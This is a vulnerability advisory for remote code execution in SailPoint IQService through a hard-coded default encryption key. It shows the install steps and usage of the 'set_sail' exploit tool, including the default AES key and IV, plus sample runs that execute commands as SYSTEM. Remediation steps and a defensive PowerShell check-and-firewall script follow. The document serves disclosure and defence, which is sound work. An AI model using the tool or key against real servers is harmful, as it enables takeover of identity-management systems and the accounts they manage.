Remote Code Execution in SailPoint IQService via Default Encryption Key
Exploit details, discovery methods, and remediation guidance available via NetSPI's Hack Responsibly technical blog:
Set Sail: Remote Code Execution in SailPoint IQService via Default Encryption Key
Vendor: SailPoint
Product: IQService
Versions Affected: Default configuration before IQService-May-2025
Researcher: Jason Juntunen @missing0x00
CWE: CWE-1394: Use of Default Cryptographic Key
| CVSS | Score | Severity | Vector |
|---|---|---|---|
| CVSS 3.1 | 10.0 | Critical | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| CVSS 4.0 | 10.0 | Critical | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
Note: CVSS vectors and scores were calculated for servers using the default encryption key. This vulnerability can be fully mitigated by following the vendor-provided Secure Communication Between VA and IQService guidance.
SailPoint IQService before IQService-May-2025 is affected by a Remote Code Execution vulnerability. This is considered to be a configuration issue which impacts servers deployed using the default settings.
When deployed using default settings, the IQService RPC Server:
- Relies on a hard-coded encryption key to encrypt communications and prevent unauthorized requests
- Does not enforce user authentication
- Does not use SSL/TLS
Warning: At the time of initial disclosure, the default encryption key (intended for demo and test environments) was contained in a publicly available DLL file. This key should be considered compromised and not trusted for production use.
An attacker who knows the default encryption key can send a crafted request to the service to execute arbitrary code. Due to the application's role in Identity and Access Management, additional requests can be used to compromise managed accounts beyond the application itself.
```shell
git clone https://github.com/NetSPI/set_sail
cd set_sail
python3 -m venv set_sail
source set_sail/bin/activate
python3 -m pip install -r requirements.txt
python3 -m pip install pycryptodome
```

```
python3 set_sail.py -h
usage: set_sail.py [-h] [-p PORT] [-c [COMMAND]] [-k [KEY]] [-i [IV]] [--ssl] [--check] [-x XML] [-v] target

positional arguments:
  target        Target server address

options:
  -h, --help    show this help message and exit
  -p PORT       Target IQService RPC port (default: 5050)
  -c [COMMAND]  Command to run (default: whoami)
  -k [KEY]      AES key as hex string (default: 445a343241355532424f503057543256)
  -i [IV]       AES IV as hex string (default: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)
  --ssl         Use SSL/TLS for TCP connection
  --check       Send test payload to verify default key
  -x XML        XML file for custom RPC payload
  -v            Increase output verbosity, use -vv or -vvv for more (requires coloredlogs)
```
The `--check` argument can be used to test for successful encryption and decryption without executing further commands.

```
python3 set_sail.py 10.1.1.10 --check
VULNERABLE 10.1.1.10:5050
```

This sends an RPC request with `service="ADConnector" method="DoNothing"` and looks for `RpcResponse` in the decrypted response.
The default command is `whoami`. Arbitrary commands can be executed using `-c`.

```
python3 set_sail.py 10.1.1.10
>>> whoami
nt authority\system
```
Running `.\IQService.exe -v` will return the service configuration information.

```
python3 set_sail.py 10.1.1.10 -c '.\IQService.exe -v'
>>> .\IQService.exe -v
ServiceName : IQService-Instance1
Display Name : SailPoint IQService-Instance1
Configured Port : 5050
Connection Read Timeout : 15
Update Interval : 30
Build version : IQService-Feb-2025
Build timestamp : 02/06/2025 03:31 AM -0600
Build location : master
Build builder : jenkins
Build Number : 778
Executable : C:\IQService_Feb2025\IQService.exe
File Size : 78520
File Date : 2/6/2025 3:32:22 AM
Trace Level : 3 [ debug ]
Connection to port 5050 uses default encryption keys.
Note: SailPoint recommends to configure Client Authentication and TLS Communication between IdentityNow and IQService to appropriately secure the communication with the IQService!
```
- Update IQService to the most recent version to ensure the availability and enforcement of security enhancements.
- Configure TLS communication and Client Authentication between the VA and IQService.
- Restrict authorized accounts to only those necessary to run the service.
- Restrict network access to the IQService server using firewall rules.
- Ensure that IQService is not accessible from the public internet.
- Understand that many tools are insecure by default. Apply the necessary settings to remove test and debug features.
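As an added example (not from the set_sail repository or from SailPoint), the following PowerShell script, run locally on the IQService host, checks the two findings visible in the `IQService.exe -v` output above (the "uses default encryption keys" line and a build older than IQService-May-2025) and then applies the firewall restriction from the remediation list. It assumes the install path shown in the sample output and uses a placeholder VA address.

```powershell
# Added example, not part of the set_sail repository or SailPoint's own tooling.
# Assumptions: IQService is installed at $IQServicePath (the path shown in the
# advisory's sample output) and the only legitimate client is the VA at $VaAddresses.
$IQServicePath = 'C:\IQService_Feb2025\IQService.exe'
$VaAddresses   = @('192.0.2.10')   # placeholder: replace with your VA address(es)
$Port          = 5050              # "Configured Port" from IQService.exe -v
$Culture       = [cultureinfo]::InvariantCulture
$FixedBuild    = [datetime]::ParseExact('May-2025', 'MMM-yyyy', $Culture)

# 1. Ask the service for its configuration (the same output the advisory shows).
$info = (& $IQServicePath -v 2>&1) | Out-String

# 2. Finding A: the service itself reports that the default key is in use.
if ($info -match 'uses default encryption keys') {
    Write-Warning "Port $Port still uses the default (publicly known) encryption key."
}

# 3. Finding B: the build predates the IQService-May-2025 release.
if ($info -match 'Build version\s*:\s*IQService-([A-Za-z]{3}-\d{4})') {
    $build = [datetime]::ParseExact($Matches[1], 'MMM-yyyy', $Culture)
    if ($build -lt $FixedBuild) {
        Write-Warning "Build IQService-$($Matches[1]) predates IQService-May-2025; update it."
    }
}

# 4. Report any enabled inbound allow rule that already opens the RPC port.
Get-NetFirewallPortFilter -Protocol TCP |
    Where-Object { $_.LocalPort -eq "$Port" } |
    Get-NetFirewallRule |
    Where-Object { $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' -and $_.Enabled -eq 'True' } |
    ForEach-Object { Write-Warning "Review existing inbound allow rule for port ${Port}: $($_.DisplayName)" }

# 5. Restrict the RPC port to the VA. Windows Firewall evaluates Block rules before
#    Allow rules, so rather than adding a broad Block rule, keep the profile default
#    at Block and add one Allow rule scoped to the VA address(es).
Set-NetFirewallProfile -Profile Domain,Private,Public -DefaultInboundAction Block
New-NetFirewallRule -DisplayName 'IQService RPC (VA only)' -Direction Inbound `
    -Protocol TCP -LocalPort $Port -RemoteAddress $VaAddresses -Action Allow | Out-Null
```

Run it from an elevated PowerShell session; the firewall step only narrows the RPC port and does not replace enabling TLS and client authentication per the SailPoint guidance.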
- Technical Analysis https://www.netspi.com/blog/technical-blog/network-pentesting/remote-code-execution-sailpoint-IQService/
- Introduction to IQService https://documentation.sailpoint.com/connectors/iqservice/help/integrating_iqservice_admin/intro.html
- Secure Communication Between VA and IQService https://documentation.sailpoint.com/connectors/iqservice/help/integrating_iqservice_admin/secure_communication.html
- Configuring TLS and Client Authentication for IQService https://documentation.sailpoint.com/connectors/iqservice/help/common/topics/configuring_tls_and_client_authentication_for_iqservice.html
- Installing and Registering IQService https://documentation.sailpoint.com/connectors/iqservice/help/integrating_iqservice_admin/install_register.html
- IQService-May-2025 Release Notes https://developer.sailpoint.com/discuss/t/new-capability-integration-service-iqservice-may-2025-is-now-live/103924